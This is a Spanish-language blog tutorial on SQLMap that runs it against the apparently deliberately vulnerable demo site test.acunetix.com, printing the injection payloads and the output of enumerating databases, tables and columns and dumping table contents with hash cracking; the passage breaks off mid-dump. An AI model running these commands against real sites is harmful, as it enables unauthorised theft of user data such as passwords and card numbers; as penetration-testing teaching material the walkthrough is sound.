Tag Archive | hacking

SQLMap

Hola!

Muy buenas a todos/as!

SQLMap es una herramienta para automatizar la explotación de vulnerabilidades SQL.

Para disponer de la última versión y, por lo tanto poder usar todas sus características bajamos la última versión con svn
root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
Ya disponemos de la última versión de SQLMap.

Ahora empezaremos ha hacer una prueba.

Primero hay que encontrar una página web vulnerable, y además si permite hacer inyección y extraer información.

Empezamos,

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws.
Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:36:55

[16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:36:55] [INFO] resuming injection data from session file
[16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:36:55] [INFO] testing connection to the target url
[16:36:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:36:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:36:56

He remarcado en rojo información importante.

Podemos ver que es vulnerable así que ahora extraeremos tanto los usuarios como las bases de datos

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent
 is illegal. It is the end user's responsibility to obey all applicable local, state and
 federal laws. Authors assume no liability and are not responsible for any misuse or damage
caused by this program

[*] starting at 16:41:00

[16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:41:00] [INFO] resuming injection data from session file
[16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:41:00] [INFO] testing connection to the target url
[16:41:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:41:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:41:01] [INFO] fetching database users
database management system users [1]:
[*] 'acuart'@'localhost'

[16:41:01] [INFO] fetching database names
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:41:01

Queda remaracado en rojo información acerca de la bases de datos además del usuario.

Ahora sacaremos las tablas concretas de una base de datos

root@bt:/pentest/database/sqlmap# python sqlmap.py
-u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable local,
 state and federal laws. Authors assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 16:46:44

[16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:46:44] [INFO] resuming injection data from session file
[16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:46:45] [INFO] testing connection to the target url
[16:46:45] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:46:45] [INFO] fetching tables for database: acuart
[16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
Database: acuart
[7 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| users |
+-----------+

[16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:46:45

Ahora que ya tenemos las tablas, iremos a buscar las columnas

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --columns

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is
 illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
 Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:50:28

[16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:50:28] [INFO] resuming injection data from session file
[16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:50:29] [INFO] testing connection to the target url
[16:50:29] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT
(CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:50:29] [INFO] fetching tables for database: acuart
[16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'users' on database 'acuart'
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| cat_id | int(5) |
| cdesc | tinytext |
| cname | varchar(50) |
+--------+-------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| cart_id | varchar(100) |
| item | int(11) |
| price | int(11) |
+---------+--------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| a_id | int(11) |
| cat_id | int(11) |
| img | varchar(50) |
| pic_id | int(5) |
| plong | text |
| price | int(11) |
| pshort | mediumtext |
| title | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| feature_text | text |
| pic_id | int(11) |
+--------------+---------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| adesc | text |
| aname | varchar(50) |
| artist_id | int(5) |
+-----------+-------------+

Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| mesaj | text |
| sender | varchar(150) |
| senttime | int(32) |
+----------+--------------+

[16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:50:31

Ya tenemos la información referente a las columnas

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --dump

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:33

[16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:56:33] [INFO] resuming injection data from session file
[16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:56:33] [INFO] testing connection to the target url
[16:56:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:56:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:56:34] [INFO] fetching tables for database: acuart
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
 acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender,
 varchar(150), mesaj, text, senttime, int(32)
[16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart'
[16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch
--no-cast (fixing problems with some collation issues)
[16:56:35] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: guestbook
[0 entries]
+-------+--------+----------+
| mesaj | sender | senttime |
+-------+--------+----------+
+-------+--------+----------+

[16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com
/dump/acuart/guestbook.csv'
[16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id,
varchar(100), price, int(11), item, int(11)
[16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart'
recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based
 attack? [Y/n/q] y
[16:56:51] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files

[16:57:04] [INFO] using default dictionary
[16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:57:46] [WARNING] no clear password(s) found 
Database: acuart
Table: carts
[43 entries]
+----------------------------------+------------+-------+
| cart_id | item | price |
+----------------------------------+------------+-------+
| 59bc1b0b420b28ec09d673886c9e6c5e | 6 | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 0 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 7 | 15000 |
| 103182aada3cc3df0f6eb53e12338805 | 3 | 986 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 3 | 986 |
| 407f7a7006ae7e1e290a0deef4adddca | 5 | 444 |
| 407f7a7006ae7e1e290a0deef4adddca | 2 | 1230 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -268435455 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 3 | 986 |
| 94e69794012f981ba39b45e3d67b9bb4 | 6 | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 3 | 986 |
| ee7a540800a6314cb8e853294a3fd364 | -268435455 | 986 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 2 | 800 |
| 103182aada3cc3df0f6eb53e12338805 | 4 | 1000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 6 | 10000 |
| ee7a540800a6314cb8e853294a3fd364 | 0 | 986 |
| 103182aada3cc3df0f6eb53e12338805 | 6 | 10000 |
| 103182aada3cc3df0f6eb53e12338805 | 1 | 500 |
| 407f7a7006ae7e1e290a0deef4adddca | 7 | 1 |
| ee7a540800a6314cb8e853294a3fd364 | -1 | 986 |
| fb410f050b45babb0fa88ae1c7e5dcce | 2 | 800 |
| 407f7a7006ae7e1e290a0deef4adddca | 1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 5 | 460 |
| 3fc1a7bc4d6afab0889708ed649f5e59 | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 2 | 800 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 7 | 15000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 4 | 1000 |
| ee7a540800a6314cb8e853294a3fd364 | 268435455 | 986 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 1 | 500 |
| ee7a540800a6314cb8e853294a3fd364 | 3 | 986 |
| 407f7a7006ae7e1e290a0deef4adddca | 6 | 123 |
| 357dce450e0ca7bd2d1c04f55905e10f | 1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 268435455 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 4 | 1000 |
| a33e8f5069b5a8d7e6b579697bfaf96d | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 5 | 460 |
| e8513b2f278260d085e29bc4491cdf0b | 2 | 8 |
| 94e69794012f981ba39b45e3d67b9bb4 | 3 | 986 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 1 | 500 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 2 | 800 |
| 9c7ab77a32a914594d838f1e657f56ab | 5 | 100 |
+----------------------------------+------------+-------+

[16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv'
[16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext
[16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart'
Database: acuart
Table: categ
[4 entries]
+--------+---------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
----------------------------------------------------------------+-----------+
| cat_id | cdesc | cname |
+--------+-------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------
--------------------------------------------------------+-----------+
| 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\n Cras venenati | Posters |
| 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\n Cras venenati | Stickers |
| 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst.
Nulla nonummy. Cras quis libero.\n Cras venenati | Graffity |
| 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
Cras quis libero.\n Cras venenati | Paintings |
+--------+---------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
-----------------------------------------+-----------+

[16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump
/acuart/categ.csv'
[16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11),
feature_text, text
[16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart'
[16:57:48] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: featured
[0 entries]
+--------------+--------+
| feature_text | pic_id |
+--------------+--------+
+--------------+--------+

[16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output
/test.acunetix.com/dump/acuart/featured.csv'
[16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
artist_id, int(5), aname, varchar(50), adesc, text
[16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart'
Database: acuart
Table: artists
[3 entries]
+--------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
-+---------+-----------+
| adesc | aname | artist_id |
+---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------
---------------+---------+-----------+
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\
nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean
 viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam
 lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet,
consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum
condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis.
 Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio.
 Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent
per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor
.\n</p> | lyzae | 3 |
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst.
Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n
Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra.
 Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n
Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer
 adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum
facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam
posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio.
Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora
torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et,
rutrum et, tortor.\n</p> | r4w8173 | 1 |
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet
 pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent
taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros,
 semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec
 molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse
 platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam
 fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris
vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per
inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p> | Blad3 | 2 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+-----------+

[16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/
test.acunetix.com/dump/acuart/artists.csv'
[16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id,
 int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100),
img, varchar(50)
[16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart'
Database: acuart
Table: pictures
[7 entries]
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+
| a_id | cat_id | img | pic_id | plong | price | pshort | title |
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+
| 2 | 1 | ./pictures/7.jpg | 7 | bla bla bla long | 15000 | bla bla bla | Trees |
| 1 | 2 | ./pictures/6.jpg | 6 | <p>\nThis picture is an 99 cm x 200 cm masterpiece.\
n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder.
Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information.
This text is not meant to be read. This is being used as a place holder. Please feel free to change this
 by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information. \n</p> | 10000 | Lorem ipsum dolor sit
 amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin.\n | Thing |
| 1 | 1 | ./pictures/5.jpg | 5 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text
is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting
 your own information.This text is not meant to be read. This is being used as a place holder. Please feel free
to change this by inserting your own information.This text is not meant to be read. This is being used as a place
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This
is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 460
| Lorem ipsum dolor sit amet, consectetuer adipiscing elit. | Mean |
